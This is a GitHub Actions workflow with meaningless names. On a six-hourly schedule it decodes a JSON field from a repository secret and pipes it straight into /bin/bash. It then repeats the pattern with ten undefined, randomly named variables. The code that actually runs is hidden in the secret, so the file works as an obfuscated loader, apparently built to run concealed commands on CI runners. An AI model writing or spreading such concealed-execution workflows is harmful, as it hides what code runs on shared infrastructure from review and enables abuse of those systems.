name: doveelderly

on:
  workflow_dispatch:
  schedule:
    - cron: '38 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: doveelderly
        env:
          ckbk01924: ${{ secrets.ckbk01924 }}
        run: |
          echo $ckbk01924 | jq -r .phy8351 | /bin/bash
          echo $x9199 | jq -r .ydlbb348 | /bin/bash
          echo $m00 | jq -r .evie666 | /bin/bash
          echo $ytc858 | jq -r .zavq234 | /bin/bash
          echo $cuqy118 | jq -r .yw8 | /bin/bash
          echo $hjv52 | jq -r .n312 | /bin/bash
          echo $xfwc83 | jq -r .tqk2 | /bin/bash
          echo $bpi5 | jq -r .tl05503 | /bin/bash
          echo $uvi4 | jq -r .cvopr7973 | /bin/bash
          echo $ji2553 | jq -r .rvx491 | /bin/bash
          echo $hxn87794 | jq -r .ozhx16173 | /bin/bash

